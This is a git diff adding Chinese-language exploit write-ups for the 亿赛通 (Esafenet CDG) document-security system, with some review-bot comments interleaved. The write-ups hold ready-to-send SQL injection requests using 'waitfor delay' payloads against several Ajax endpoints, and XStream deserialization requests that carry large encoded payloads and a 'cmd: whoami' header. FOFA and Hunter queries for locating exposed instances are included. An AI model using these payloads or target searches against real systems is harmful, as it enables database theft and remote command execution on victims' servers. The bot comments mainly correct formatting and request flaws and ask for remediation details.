EIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJ
BDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBO
JNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKH
JIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1703403828782-3a8774fa-6cc5-47dc-be05-e0bfbf8c8c1e.png](./img/DgrdPy_Vw0EsYXrS/1703403828782-3a8774fa-6cc5-47dc-be05-e0bfbf8c8c1e-793077.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/asg0x3iakl1p0c65> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..bc74b81 --- /dev/null 
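Review bot: `Host: {hosname}` in the reproduction request is a misspelled placeholder and would be sent literally; make it `{hostname}`. The "二、影响版本" section lists only the product with no version range or fixed build, and "一、漏洞简介" repeats the title without naming the XStream version or the component at fault, so a defender has nothing to act on; add the affected and fixed versions and a mitigation (upgrade, or restrict `/CDGServer3/MailMessageLogServices` at the edge, which is also the obvious detection key together with the non-standard `cmd:` request header). Two smaller points: the fence is tagged `java` but holds a raw HTTP request, and the body is the same opaque blob as the preceding file's request (same leading `NNLINELBII...` and trailing `...BDNEJCNPK`), so document it once and reference it instead of pasting roughly 14 KB into every entry.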
+++ b/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` MultiServerAjax`接口的`serverId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../MultiServerAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=delServer&serverId=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..9f3b0f3 --- /dev/null +++ b/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md 
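Review bot: the probe in the `poc` block rides on `command=delServer`, a delete action, so the entry should state that running it against a live instance can modify data, not only delay the response. The body text writes the vendor as "亿某通" while the title says "亿赛通"; use one name. Unlike the neighbouring entries this file has no affected-version section and no fix, and the description already names the missing control (预编译, i.e. prepared statements), so add a line saying the remediation is to bind `serverId` as a parameter. Style: the fence is tagged `javascript` but contains an HTTP request, and `Host: your-ip` should use the same placeholder convention as the other files.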
@@ -0,0 +1,49 @@ +# 亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/U6wPZQCifyuPkb46/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-143086.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/js/../NavigationAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Connection: close +Content-Length: 58 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +command=nav&id=-999'waitfor delay '0:0:3'--+&name=&openId= +``` + +![1711815896185-51f664d1-4d80-4cdd-ac3d-46055a015edb.png](./img/U6wPZQCifyuPkb46/1711815896185-51f664d1-4d80-4cdd-ac3d-46055a015edb-675720.png) + +sqlmap + +```plain +POST /CDGServer3/js/../NavigationAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Connection: close +Content-Length: 58 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +command=nav&id=1&name=&openId= +``` + +![1711815990103-01f2eb07-4c45-4456-9854-a13bb709e0c7.png](./img/U6wPZQCifyuPkb46/1711815990103-01f2eb07-4c45-4456-9854-a13bb709e0c7-010306.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rkfurtrt642vfvu6> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..654c694 --- /dev/null +++ b/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md 
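Review bot: the second request (the sqlmap template) keeps `Content-Length: 58` from the first request, but its body `command=nav&id=1&name=&openId=` is 30 bytes, so a server will wait for 28 more bytes and the request will hang or be rejected; set it to 30 or drop the header. Both requests also have an empty `Host:` line; put a placeholder there. The "一、漏洞简介" paragraph is mostly product marketing and says nothing about which query builds `id` into SQL, and "二、影响版本" gives no version range or fixed build; replace the marketing text with the technical cause and add the fix (parameterize `id` in the `nav` command handler, or upgrade) so the entry helps defenders as well as testers.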
@@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` NetSecPolicyAjax`接口的`id`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```javascript +POST /CDGServer3/js/../NetSecPolicyAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=upPriority&id=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..bb7073e --- /dev/null +++ b/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md 
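Review bot: the description claims the flaw may let an attacker "直接获取服务器权限", but the only evidence on the page is a 5-second time delay via `command=upPriority&id=-1'waitfor delay '0:0:5'--`; either qualify that claim or add what supports it. As in the MultiServerAjax entry, the body says "亿某通" while the title says "亿赛通", there is no affected-version or fix section, and the fence is tagged `javascript` for an HTTP request; since the text itself names the missing control (预编译), state that binding `id` as a prepared-statement parameter is the remediation. The file is otherwise a near copy of the MultiServerAjax entry, so consider a shared template or a single entry listing both endpoints.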
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/pAmvocl6LiMwYXO4/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-014601.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/ODMSubmitApplyService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBE
DCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMF
LNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGB
